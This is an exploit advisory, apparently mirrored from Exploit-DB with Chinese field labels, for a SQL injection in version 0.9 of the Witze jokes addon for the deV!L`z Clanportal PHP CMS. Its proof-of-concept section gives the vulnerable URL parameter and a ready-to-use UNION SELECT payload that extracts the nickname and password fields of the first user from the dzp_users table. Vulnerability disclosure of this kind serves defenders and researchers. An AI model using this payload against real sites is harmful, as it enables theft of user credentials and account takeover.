DZCP (deV!L`z Clanportal) Witze Addon 0.9 – SQL Injection

  • 作者: Easy Laster
    日期: 2012-03-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18558/
  • ========================================================================================
    | # Title: deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability
    | # Author : Easy Laster
    | # Download : http://dzcp-zone.de/downloads/?action=show&id=97
    | # Script : Witze Addon Versions 0.9
    | # Price: free
    | # Bug: SQL Injection
    | # Date : 03.03.2012
    | # Language : PHP
    | # Status : vulnerable
    | # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
    ======================Proof of Concept =================================
    
     [+] Vulnerability
     
     jokes/index.php?action=show&id=
    
     [+] Injectable
     
     jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+